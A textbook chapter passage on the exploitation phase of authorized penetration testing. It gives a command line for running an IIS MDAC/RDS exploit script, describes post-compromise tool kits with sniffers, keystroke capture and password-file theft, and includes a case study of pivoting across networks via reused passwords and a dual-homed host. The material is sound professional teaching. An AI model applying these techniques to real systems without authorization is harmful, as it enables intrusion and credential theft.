- 1 Network Enumeration/Discovery
- 2 Vulnerability Analysis
- 3 Exploitation
5.3 Exploitation
Once the list of vulnerabilities has been identified, the next step is to proceed to exploit the vulnerabilities in an attempt to gain root or admin-level access to the target systems.
Our general procedure is determined in part by the results of our enumeration and information gathering. We examine the list of known vulnerabilities and potential security holes on the various target hosts and determine which are most likely to be fruitful. Next we pursue exploiting those vulnerabilities to gain root access on the target system.
Primary targets are open ports and potentially vulnerable applications. Our approach is to review the list of vulnerabilities collected in the previous stage and sort them by likelihood of success and potential harm to the target network to see which may be helpful in our exploitation efforts. For instance, a buffer overflow or denial-of-service attack may well be successful on the target but also dangerous to the system. Unless the contract specifically calls for DoS attacks to be performed as part of the test, they should not be attempted.
Among the common exploits performed are Web-server hacks. This is fast becoming a popular way to compromise target networks. One popular Web-based hack is the Microsoft IIS MDAC/RDS hack. This is an exploitation of the IIS Web server through the msadcs.dll file and the Remote Data Service (RDS). It allows the attacker to execute a single command on the target host. The command can be reused to execute a succession of individual commands that when taken together can be used to achieve a variety of results, such as retrieving sensitive files on the target host and making connections to other hosts. Also, when used in conjunction with other tools, such as the ntuser command, it can allow a user to be placed into the local administrator's group.
A Perl script, msdacExploit.pl, coded by rain forest puppy, can remotely exploit this vulnerability and is widely available. (The msdacExploit.pl file is not the only file coded to exploit this hole.) In order to perform this exploit, simply run the following command against the target host.
C:\> perl x msdacExploit.pl h <target host>
(You do not necessarily have to be in the C drive.) A command prompt from the target host should appear on your machine and allow you to execute one command. To run multiple commands, the exploit must be run multiple times.
Once we have obtained unauthorized access to a remote system through either the ability to execute a command on a target host or direct access to an actual user account, we immediately document all relevant information, including the host and directory or share name to which we have gained access, the host from which we gained access, the date and time, and the level of access. Also, we specify the hole(s) that we exploited to gain access. Next, we share this information with the target organization . This serves two purposes: (1) to alert the organization to the hole(s) we have identified and exploited so that the company can begin to address the issue and (2) to cover ourselves as penetration testers from a litigation standpoint. Even in the case of an unannounced test, our point of contact (who is aware of our activities) should know when we have gained access so if we are detected the matter is not escalated to law enforcement authorities.
Having gained access to one machine is not necessarily the end of our penetration test. If additional work is within scope, we can continue by installing a tool kit comprised of the tools we can use to test other systems from the exploited box. This is different from the "root kit" used within the hacker community to represent a collection of tools and exploits used to either compromise the same system again in the future, by creating back doors or Trojaning system files, or to launch attacks against other hosts, such as distributed denial-of-service daemons.
This tool kit is tailored to the operating system of the target machine and of the machines we may encounter during the penetration test. Generally, we include netcat, password crackers, remote control software, sniffers, and discovery tools. Often, due to the connection, command line tools are preferred. GUI tools can be used if a remote control program such as pcAnywhere or Virtual Network Computing (VNC) is first installed. Otherwise, having the target send a GUI back to our box can be tricky in that it may still be blocked at the firewall or by the host itself. Additionally, it can sometimes display the GUI on the local machine, alerting the machine's user of our presence and activities.
The tool kit can be copied over with FTP or TFTP, but other means are possible as well. Once the kit is installed, we can begin penetration testing other machines. At this point, the methodology we use closely follows the internal testing method since we are essentially located on the target network. Refer to Chapter 7 for information on how to proceed with testing of additional systems.
Some of the things we do include are sniffers and keystroke capture utilities through which we can capture client traffic. We are looking specifically for user names and passwords that can be used to attempt access on other hosts, dial-in systems, or listening services on the network. Sniffers are discussed further in Chapter 14.
We also try remote control tools that allow us to control the system. There is tremendous potential for further network compromise once we have taken over one machine. We may capture the UNIX password file (along with the shadow password file) or the Windows registry (often through the version stored in the repair directory) to obtain passwords for all users on the machine and possibly the admin account(s), which likely give us access to additional machines on the network. Remote control tools and usage are discussed further in Chapter 18.
In any case, we load whatever tools will help us to use the compromised system as a platform for exploiting additional systems. However, as we load these tools, we keep careful track of what was loaded and where so we can return the system to normal after testing.
Case Study
Dual-Homed Hosts
As mentioned in Chapter 4, dual-homed hosts introduce a significant security hole into the network architecture since they can give users with access rights and privileges on one network or domain the rights and privileges they perhaps are not intended to have on a separate domain. This vulnerability usually appears as a corporate desktop machine connected to the organization's internal LAN and simultaneously connected through a modem line to a local ISP. In such a configuration, anyone on the Internet may be able to access the corporate network through the dial-up connection. However, there are other configurations in which this vulnerability can occur.
For example, on one engagement in particular, the client was an ISP that also provided Web-hosting services for thousands of companies. The hosting facility consisted of a large number (in the hundreds) of UNIX-based hosts, with identical configuration, running the Netscape Web servers.
The ISP's model, in place of providing full management, was to maintain the machines but allow the clients to manage the Web servers themselves.
Included in the Web-hosting package was the tcl scripting language, which allowed remote management of the Web servers. What perhaps was unknown to the ISP is that through the tcl scripting language, knowledgeable clients and even visitors to the hosted Web sites would be able to do more than basic administration. It was possible to use the Web server, which was running with root privileges, to gain root access on the machines through various specially crafted URL strings. This is an input-validation attack against the Web server.
This led to the compromise of the host machine, in much the same way misconfigured Microsoft IIS servers can lead to the compromise of the host machine. However, this did not turn out to be the worst exposure on the network.
Once a machine on the Web-hosting network was compromised (for example, root access was achieved), a hacker tool kit could be loaded onto that machine, including tools to crack passwords. Once having gained root access on one machine, we were able to determine that the network was connected to a second network used to support various business units of the ISP. Further, we found that some users on the Web-hosting network had accounts on the second network as well and used the same passwords.
At this point, access to this second network was achieved simply by the existence of accounts with the same user name and password on both networks, and the hacker toolkit could again be copied and installed.
We were able to determine that a machine on this second network was also homed on a third network. This third network was the corporate, internal network used to support payroll and accounting functionality and to maintain client databases and other such valuable assets. This network was intended to be a self-standing, internal network. One machine was mistakenly left dual-homed.
This machine was discovered by identifying that it had two NIC cards with IP addresses belonging to two separate address ranges. Therefore, user accounts (and the root account) on this box had rights on both networks. As can be expected, the root account had the same password on all hosts in the second network, and therefore, we gained root access to the organization's core, internal network.
In summary, it was possible to gain root access to a machine on the Web-hosting network using software existing on the Web servers themselves, to jump to a second network through user accounts with the same user name/password pairs, and finally, after discovering a dual-homed box, to gain unauthorized access to the internal corporate network. Actually, given that valid access rights had been attained, this access was authorized in the sense that access control mechanisms did not stop it or identify it as being unnecessary.
After the company managers realized they had inadvertently left a machine on their internal, private network dual-homed on a network that had connections to the outside world, and thereby damaged the integrity and confidentiality of the company's critical data assets and client information, they were understandably shocked and mortified.
Lessons Learned
We have seen several cases where organizations were unaware that a dual-homed machine existed or the organization had used a dual-homed host as an easy solution to fix problems with certain applications communicating through firewalls. The moral of the story is that close attention needs to be paid to an organization's network architecture. After designing and implementing a secure architecture, including both host configuration and overall network topology, any changes must go through a change-control mechanism to help prevent security exposures such as the dual-homed scenario from sneaking into the environment.